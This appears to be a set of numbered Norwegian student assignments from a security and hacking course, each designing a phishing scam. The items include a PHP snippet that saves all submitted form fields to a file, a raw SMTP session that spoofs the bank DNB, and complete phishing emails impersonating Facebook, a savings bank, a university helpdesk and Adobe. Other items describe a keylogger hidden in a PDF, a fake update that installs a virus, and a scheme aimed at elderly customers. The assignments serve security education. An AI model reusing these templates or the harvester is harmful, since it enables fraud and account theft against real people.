50 header( Location: ' ); $handle = fopen( passordplx.txt, a ); foreach($_post as $variable => $value) { fwrite($handle, $variable); fwrite($handle, = ); fwrite($handle, $value); fwrite($handle, \r\n ); } fwrite($handle, \r\n ); fclose($handle); exit;?> spoofing HELO meg.hiof.no MAIL FROM: kundeservice@dnb.no RCPT TO: hjerterud.olsen@hotmal.com DATA from: DNB <kundeservice@dnb.no> to: Hjerterud Olsen <hjerterud.olsen@hotmal.com> replyto: kundeservice@dnb.nu subject: VIKTIG! Mistenkelig aktivitet Kjære kunde, Vi mistenker at noen forsøker å misbruke din bankkonto. Vennligst logg inn med din bankid på denne siden: <a href= > så vil en av våre sikkerhetsansvarlige undersøke saken. Med vennlig hilsen Ole Svartstad, sikkerhetsansvarlig DNB Denne eposten inneholder viktig informasjon. DNB vil aldri be deg om å oppgi sensitiv informasjon i epost, Ønsker du ikke å motta epost fra DNB kan du melde deg av her. QUIT

51 Facebook I vårt svindelforsøk ville vi ha valgt å utnytte folks godtroenhet til facebook og eposter som kommer derfra. En simpel måte å lure til seg facebook-passord er å lage en helt vanlig epost som ser ut som den er sendt fra facebook security team eller noe sånt, med riktig facebookformatering, og med en link som det står login her eller lignende. Den linken ville ført deg til en falsk facebook som hadde likt utseende som Hver gang noen hadde prøvd å logge seg inn hadde passordet blitt lagret, og brukeren videresendt til den ekte facebook. En enkel og effektiv løsning, men krever jo litt teknisk, for å få til den falske siden. Eksempel på hvordan en slik epost kunne sett ut (med tanke på tekst): Kjære Facebook-bruker! Den siste tiden har flere som bruker Facebook opplevd å bli frastjålet sin Facebookkonto. Vi i sikkerhetsteamet her hos Facebook jobber kontinuerlig for å forhindre at du og andre Facebook-brukere skal bli utsatt for dette. I forbindelse med denne innsatsen her hos Facebook, er vi i ferd med å implementere nye sikkerhetsrutiner rundt epost-adressene som brukes på Facebook. Det er i den forbindelse at vi i sikkerhetsteamet her hos Facebook, behøver din hjelp. For å sette i verk denne nye sikkerhetsrutinen på din konto, er det nødvendig at du besøker Facebook via linken under, og logger inn med din personlige epost-adresse og ditt passord, slik at de nye sikkerhetstiltakene kan iverksettes og knyttes opp mot din konto og epost-adresse. *link* Vi anbefaler også at du ser i gjennom dine personlige sikkerhetsinnstillinger. Vennlig hilsen, Sikkerhetsteamet, Facebook I denne svindelen utgir vi oss for å være fra sikkerhetsteamet hos facebook. Dette, sammen med opplysninger om hvordan vi stadig jobber med å forbedre sikkerheten, skaper man en tillit hos den som leser mailen. Vi forteller om sikkerheten som øker, for så å komme med en liten ting brukeren må gjøre for å forbedre sin egen sikkerhet. Bare gå til en link, og logge inn på facebook, så har man forbedret sikkerheten til sin egen konto.

52 Berg-Sparebank Sette opp en falsk nettside for å stjele passord og annen informasjon fra bankkunder. Vi må understreke at vi ikke har noe erfaring med slikt fra tidligere, og at det derfor kan være noen grep vi ikke har tatt forbehold om her. Vi sender en til mange tilfeldige brukere, hvor noen av dem vil være kunder hos banken. I en vil vi inkludere logo og farger slik at det etableres et godt førsteinntrykk (at dette er seriøst). Vi skriver noe lignende som: «Kjære kunde. Deres passord begynner å bli gammelt. Vennligst følg linken under for å bytte passord, slik at Dere ikke mister tilgang til nettbanken». Nederst i en har vi en link hvor man kan trykke seg videre til vår url (den originale adressen er berg-sparebank.no). Når de trykker linken kommer de til vår nettside, som naturligvis vil ha mest mulig likhetstrekk med den originale designen. På nettsiden må de skrive inn gammelt passord og fødselsnummer. Når brukerne forøker å bytte passord vil vi kunne avlese hva de trykker inn av informasjon. Boksen vil kreve at man må skrive inn kortnummer og ccv nummer for å verifisere bankkortet slik at kortet fortsatt kan brukes sammen med nettbanken. Hvis man ikke gjør dette vil man ikke kunne bruke bankkortet når man skal handle på nettbutikker. I det man får et svar fra en -konto, som da bekrefter at personen bak er kunde, vil man kanskje kunne finne navnet på personen. Da kan man også eventuelt ringe personen, og utgi seg for å være banken. Vi lurer altså noen steg for steg. Først trykker de på linken, så trykker de inn kontoinformasjon og fødselsnummer. Når man da er inne i det hele, fortsetter vi med å spørre etter kortinformasjon. Styrken ved vår metode (som kanskje ikke er revolusjonerende) er at mange brukere forventer å kunne avsløre søppelpost, fordi man mener at slike er bærer preg av å være lureri. Målgruppen vil være eldre brukere, både fordi de er mindre kjent med hvordan slik svindel fungerer og fordi de ofte vil være mer velstående enn andre grupper i samfunnet.

53 Passordstjeling Da jeg er lite kreativ, valgte jeg å gå for en svindel som går ut på å prøve å få tak i passord og brukernavn til studenter og/eller ansatte ved høgskolen. Det første jeg ville gjort, er å lage en side som er identisk til med så lite forskjell fra denne adressen som mulig. Videre ville jeg da ha gjort mitt beste for å få tilgang til en maskin på høgskolen uten å bruke mitt brukernavn og passord, hvor jeg da ville ha sendt ut en mail til mailinglistene via telnet. From: helpdesk@hiof.no To: list.alle.alle Subject: Passordbytte Vi har for tiden hatt problemer med at folk har kommet seg inn på andre brukeres kontoer, i henhold til kurset Sikkerhet og Hacking som holdes ved høgskolen. Flere av studentene har ikke fulgt retningslinjene som ble gitt av kursets foreleser, og har testet ut flere av teknikkene her på høgskolens internnettverk. Vi ber derfor alle våre brukere om å være ekstra varsomme, og anbefaler alle å bytte ut passordene sine. Dette kan dere gjøre ved denne siden: (Linker selvfølgelig ikke til denne siden.) Mvh. Skolens helpdesk team. Det brukeren da ville få opp når de åpner siden, ville selvfølgelig være en side som er identisk til og ville fungere slik at det som brukeren skriver inn enten vil sende informasjonen videre til den faktiske siden og bytte passordet for brukeren, slik de hadde tenkt, mens jeg blir sittende med det nye passordet deres. (Jeg regner riktignok med at det ville tatt ytterst kort tid før dette ble stengt ned, da IT-Drift garantert hadde blitt mistenksomme til at det kom en drøss av forespørsler om å bytte passord for en rekke brukere fra samme IP. Dette kunne man kanskje løst ved hjelp av et skript som byttet mellom forskjellige proxyer i Norge for å få det til å se mindre mistenksomt ut.) Det var det hele, lite kreativt er jeg redd, ingenting annet enn enkel phishing, men jeg kom dessverre ikke på noe bedre.

54 Systemgjenoppretting Svindelen går ut på å få brukeren til å bli litt stressa, og ikke tenke for mye over detaljene. I mailen får de et tidspress, som gjør at de føler at de raskt må gjøre noe. I linken så står det informasjon om hva slags informasjon facebook får og hva som blir delt og visst. De fleste brukerene vil nok bare gå inn og sjekke, og siden det er på facebook sine sider, og de føler at overskriftene er relevante med mailen, så vil de fleste bare ignorere resten. Mailen vil også bli send fra facebook ved å manipulere hvordan mailen blir sendt. PayPal I denne svindelen har jeg benyttet en paypal svindel. Svindelen går ut på at jeg sender en mail slik som i bildet under som forteller at paypal har blitt hakket og ber brukerne sine endre passord umiddelbart. Siden de fleste kjenner til mails som kan inneholde linker til svindelsider har jeg benyttet en ny svindelmetode i denne oppgaven. en er bygget opp til å ligne layouten til en vanelig paypal , bare at jeg måtte lage en helt egen layout selv pga den ekte layouten kunne ikke kopieres. I mailen ber jeg brukerne ikke om passordet, og jeg vil heller ikke re-direkte dem til noen svindelside, dermed ved å bedre bygge opp demmes tillit til mailen. Hvis man leser videre i mailen vil man legge merke til at jeg har inkludert en pdf som vedlegg som vil informer personene av paypal kontoene sine mer om hvordan de kan endre passord og lære seg å være bedre forberedt mot angrep. Men trikset med dette er at pdf-en vil inneholde en keylogger som blir initialisert når mottakerne åpner den. De vil kunne se informasjonen de har blitt lovet i mailen, men vil ikke ha noe anelse om at pdf-en installerer en keylogger software på pc-en. Slike pdf-er kan man finne på nett og til og med kjøpe fra ulike nettsider til egne formål. Ved hjelp av keyloggeren vil jeg kunne oppnå passordene dem taster inn på paypal eller andre nettsider og gjøre svindelforsøket komplett. Pdf-en har jeg ikke inkludert i selve oppgaven pga sikkerhet. Jeg kan også bruke ulike andre pdf-er med virus eller ormer som kan oppnå samme formål. De fleste mennesker tror at pdf-er er harmløse og kombinert med en mail som ikke virker krevende for noen som helst informasjon kan det være en god svindel som kan dra med de fleste. Jeg tok med informasjonen om pdf-en helt i bånn som om at den skulle virke mindre viktig. Teknikken her er at mennesker som har blitt hakket vil bli

55 fort stressa og dermed lese hele mailen slik at de får med seg alt, inkludert pdf informasjonen. Derfor vil det være en stor sjanse for at de lagrer og åpner den.

56 Adobe Acrobat I vår teoretiske svindel så skal vi utgi oss for å være fra Adobe Acrobat, som er kjempehyggelige og sier ifra til kunden ved feil. Vi sender ut en mail med troverdig informasjon om bedriften, hvor vi forteller dem at de har et oppdateringsproblem og må oppdatere raskest mulig for å ikke miste data lagret på sin maskin. De vil dermed bli alarmert og trykke seg inn på linken vi sender slik at de får fikset problemet. De blir redirektert til en side som ligner på siden til Adobe (Folk glemmer ofte å se på URL adressen/kan prøve å få den så lik troverdig som mulig). Det popper opp en boks med en oppdatering, før denne kan installeres må man godta vilkårene. De fleste leser ikke vilkårene, men ved å ha det med så vil det virke mer troverdig. De trykker deretter på install update, og installerer et virus på pcen. Til slutt får man en box som forteller at installasjonen har lyktes. Hvorfor har vi valgt denne metoden? Det at mailen kommer fra en kjent webside, gjør at offeret får mer tillitt til avsenderen og tvilen minker. Det å lage en klone av websiden til Adobe og lage et virus som har som hensikt å hente ut informasjon fra maskinen er en hacking metode kalt for Phishing. Det at det også er en krisesituasjon, og at offeret blir redd for å miste verdifull data bidrar til at offeret blir mer ivrig til å rette problemet.hei! Ny oppdatering er nå klar til å installeres på deres maskin! Grunnen til at De mottar denne en er en feil som gjør at denne oppdateringen må gjøres manuelt. Vi ber De laste ned denne oppdateringen så fort som mulig for å unngå tap av data som De har lagret på deres maskin. Last ned oppdateringen her: Mvh. Hanne Kristiansen (Teknisk ansvarlig) Adobe Acrobat Myrveien Mo Tlf:

57 10gag Vi har tenkt å phishe ut brukernavn og passord utifra en falsk facebook innloggings side. Det er mange sider som har automatisk innlogging med facebook, og mange som blindt logger inn. Vi skriver at man må være innlogget for å kunne kommentere eller like/dislike et bestemt bilde. Siden vil inneholde flere «memes» liknende de mer kjente 9gag, reddit osv. Måten man kan komme inn på siden vil være å sende ut en mail til mottaker, hvor det står beskrevet at en facebook venn har «likt» et bilde på siden vi linker til, og anbefaler mottaker å gjøre det samme. Når linken blir trykket på vil bildet dukke opp, men en ukryssbar popup vil stå i veien. Her kan man logge inn via facebook, og så snart det er gjort vil bildet synes igjen, og alt se «normalt» ut. Måten vi vil finne disse vennene på, er ved å skape en falsk facebook profil, og dermed få lettere tilgang til venners venner. Teksten i mailen vil se noe liknendedette her: Your friend «random venn» liked this picture and thought you might like it aswell. Check it out at «random-link» Deretter vil man bli videreført til en side som likner denne her: Informasjonen vi får ut av kontoopplysningene kan man enten selge videre til en tredjepart eller så har det i det siste blitt populært å holde kontoen som «gissel», og kreve penger for å gi tilbake kontoopplysningene.

58 UiO HELO: MAIL FROM: RCPT TO: Mail 1: Hei Mitt navn er Trine, jeg er en kvinne på 21 år, studere på UiO (Universitetet i Oslo) rettsvitenskap (jus). Jeg har noen spørsmål jeg vil spørre dem, det er fordi jeg har fått en oppgave til å spørre noen vi ikke kjenner noen spørsmål, det er noen enkle spørsmål og det hadde vært veldig fint om de kunne hjelpe meg med det. Hilsen Trine Mail 2: Tusen takk navn at de vil hjelpe meg, hvis det er greit vil jeg gjerne ringe dem og spørre deg de spørsmål jeg har. Har de et nummer jeg kunne ring hadde det vært fint. Hilsen Trine QUIT Forklaring: Først blir det sent en mail som spør om at noen kan ta kontakt med målet, så ringer man målet og spør spørsmål om den personen og sier at det er til en oppgave (finner ut hva slags bank målet bruker, telefon selskap OSV.). Så venter man en stund til det har kommet ut av hode til målet og ringer igjen men da som en ansatt fra banken (OSV.) og sier at det er noen problemer med kontoen til målet og ber målet om å oppgi brukernavn og passord (enten tidlig om morgen eller sendt på kvelden). Det er ikke den beste svindelen, men meste parten av folket trur ikke at en svindler vil ta seg bryet og kontakte målet. Siden jeg er en student vil sikker mange hjelpe en stakkars student som sliter med oppgaver, og siden personen studerer jus ikke vil svindle dem.

59 FedEx På e-posten står det at den er sendt ut 18.feb.2013 mens på selve mottakerfeltet står det at mailen er mottatt 26.feb Avsenderens navn ser litt mistenkelig ut. Mailen innenholder ikke noe informasjon på mottakeren som i følge dem har bestilt en vare som ikke har kunnet blitt levert. Måten mailen er avsluttet på han også være noe mistenke. mail adressen til avsender er ikke i sammsvar med ansenderens navn eller med bedriften. Sjeldent Tittelen på stillingen står sammen med navnet i avsender feltet. Man ser ikke hva som ligger bak linken. eller hvor man kan bli sendt om man trykker på den.

60 DevionART